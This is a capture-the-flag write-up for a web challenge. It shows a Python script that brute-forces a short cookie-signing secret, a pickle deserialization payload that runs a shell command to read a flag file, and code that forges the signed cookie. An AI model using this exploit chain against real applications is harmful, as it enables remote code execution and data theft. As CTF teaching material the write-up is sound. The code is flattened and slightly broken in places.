19 – Zombie Reminder
Zombies love brains. But zombies forget, so they have a tool where they can enter the location of brains they found. In a heroic mission someone managed to obtain both the source code and the information that a critical file can be found at ‘/var/www/flag’.
Your mission is to obtain the contents of this file by any means and avenge your fallen friend!
Service: https://ctf.fluxfingers.net:2073/
Source: https://ctf.fluxfingers.net/challenges/zombie_reminder.py
This challenge is a web application returning an arbitrary text that inputed by you previously. Your input is stored in “location” cookie with format of “<hash_digest>!<encoded_input>” where:
- encoded_input = base64_encode(pickle.dumps(your_input))
- hash_digest = sha256(encoded_input+secret_key)
When you go back to the main page, if a valid cookie is set the application will load the pickle object from cookie and print it out.</p> <pre class="brush: plain; title: ; notranslate" title="">location = pickle.loads(b64d(location)) </pre>
The purpose of hash_digest is to ensure that your_input is a string submitted through challenge’s web form. However this design has 2 major flaws:
- secret_key is too short (5 characters)
- pickle has a known security issue (http://nadiana.com/python-pickle-insecure)
We submit a random string (let’s say “test”) and look at the cookie:
We use this script to bruteforce the secret key :
#!/usr/bin/env python import multiprocessing from hashlib import * import string import sys s = string.ascii_letters + string.digits location = "VnRlc3QKcDAKLg==" digest = "04b098d726754c810c65595a82dd42a9564ce332fd51c0da2a43bbdd42a91f37" print len(s) WORKERS = 8 def worker(start,end): for i1 in s[start:end]: for i2 in s: for i3 in s: for i4 in s: for i5 in s: secret = i1+i2+i3+i4+i5 if sha256("%s%s" % (location, secret)).hexdigest() == digest: print "*******", secret sys.exit(0) def main(): ps = [] for i in range(WORKERS): if i == WORKERS -1: tmp = multiprocessing.Process(target=worker, args=(i*(len(s)/WORKERS),len(s),)) else: tmp = multiprocessing.Process(target=worker, args=(i*(len(s)/WORKERS),(i+1)*(len(s)/WORKERS),)) tmp.start() ps.append(tmp) for p in ps: p.join() return jobs.empty() if __name__ == '__main__': main()
After a few minutes we managed to find the key oIqxe. Our next task is to build a pickled representation of a python code object, the goal is to execute a code similar to this when pickle.loads() is called:
__import__("commands").getoutput("cat /var/www/flag")
This code is used to generate such serialized string:
import pickle, new def nasty(module, function, *args): return pickle.dumps(new.classobj(function, (), {'__getinitargs__': lambda self, arg = args: arg, '__module__': module}) ()) t = nasty("commands", "getoutput", "cat /var/www/flag") print repr(t) # Output: "(S'cat /var/www/flag'np1nicommandsngetoutputnp2n(dp3nb."
Now we have everything to get the flag, time to build a valid cookie:
from hashlib import sha256 import base64 b64e=base64.b64encode secret = 'oIqxe' location = b64e("(S'cat /var/www/flag'np1nicommandsngetoutputnp2n(dp3nb.") cookie = "%s!%s" % (sha256("%s%s" % (location, secret)).hexdigest(), location) print cookie
Place this cookie into your browser (don’t ask us how to do that lolz) and refresh, the flag will be right on the screen.
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